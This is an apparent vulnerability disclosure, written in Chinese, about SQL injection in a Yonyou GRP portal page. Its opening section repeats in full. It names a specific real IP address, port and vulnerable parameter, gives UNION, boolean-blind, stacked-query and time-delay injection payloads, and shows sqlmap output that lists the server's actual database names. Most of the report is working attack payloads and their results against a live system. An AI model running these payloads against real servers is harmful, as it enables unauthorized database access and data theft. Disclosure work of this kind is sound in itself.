### 简要描述: 用友GRP系统sql注射 ### 详细说明: 用友GRP系统sql注射 链接:http://221.2.68.102:8888/R9iPortal/cm/cm_info_content.jsp?info_id=42 注射参数: Payload: info_id=-7911 UNION ALL SELECT 78,78,78,78,78,78,78,78,78,78,78,78, CHAR(113)+CHAR(98)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(74)+CHAR(98)+CHAR(75)+CHAR (84)+CHAR(76)+CHAR(98)+CHAR(113)+CHAR(119)+CHAR(110)+CHAR(90)+CHAR(113)+CHAR(122 )+CHAR(98)+CHAR(120)+CHAR(113),78-- ### 漏洞证明: sqlmap resumed the following injection point(s) from stored session: --- Parameter: info_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: info_id=42 AND 4482=4482 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: info_id=42;WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: info_id=42 WAITFOR DELAY '0:0:5' Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: info_id=-7911 UNION ALL SELECT...
### 简要描述: 用友GRP系统sql注射 ### 详细说明: 用友GRP系统sql注射 链接:http://221.2.68.102:8888/R9iPortal/cm/cm_info_content.jsp?info_id=42 注射参数: Payload: info_id=-7911 UNION ALL SELECT 78,78,78,78,78,78,78,78,78,78,78,78, CHAR(113)+CHAR(98)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(74)+CHAR(98)+CHAR(75)+CHAR (84)+CHAR(76)+CHAR(98)+CHAR(113)+CHAR(119)+CHAR(110)+CHAR(90)+CHAR(113)+CHAR(122 )+CHAR(98)+CHAR(120)+CHAR(113),78-- ### 漏洞证明: sqlmap resumed the following injection point(s) from stored session: --- Parameter: info_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: info_id=42 AND 4482=4482 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: info_id=42;WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: info_id=42 WAITFOR DELAY '0:0:5' Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: info_id=-7911 UNION ALL SELECT 78,78,78,78,78,78,78,78,78,78,78,78, CHAR(113)+CHAR(98)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(74)+CHAR(98)+CHAR(75)+CHAR (84)+CHAR(76)+CHAR(98)+CHAR(113)+CHAR(119)+CHAR(110)+CHAR(90)+CHAR(113)+CHAR(122 )+CHAR(98)+CHAR(120)+CHAR(113),78-- --- [17:44:49] [INFO] the back-end DBMS is Microsoft SQL Server web application technology: JSP back-end DBMS: Microsoft SQL Server 2008 [17:44:49] [INFO] fetching database names [17:44:49] [INFO] the SQL query used returns 9 entries [17:44:49] [INFO] resumed: beifen [17:44:49] [INFO] resumed: lsqjdb [17:44:49] [INFO] resumed: master [17:44:49] [INFO] resumed: model [17:44:49] [INFO] resumed: msdb [17:44:49] [INFO] resumed: nyj_erp [17:44:49] [INFO] resumed: ReportServer [17:44:49] [INFO] resumed: ReportServerTempDB [17:44:49] [INFO] resumed: tempdb available databases [9]: [*] beifen [*] lsqjdb [*] master [*] model [*] msdb [*] nyj_erp [*] ReportServer [*] ReportServerTempDB [*] tempdb [<img src="https://images.seebug.org/upload/201512/07174810f04f9cf47f6c1d4fd6dfbe3f76ee6dd2.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201512/07174810f04f9cf47f6c1d4fd6dfbe3f76ee6dd2.png)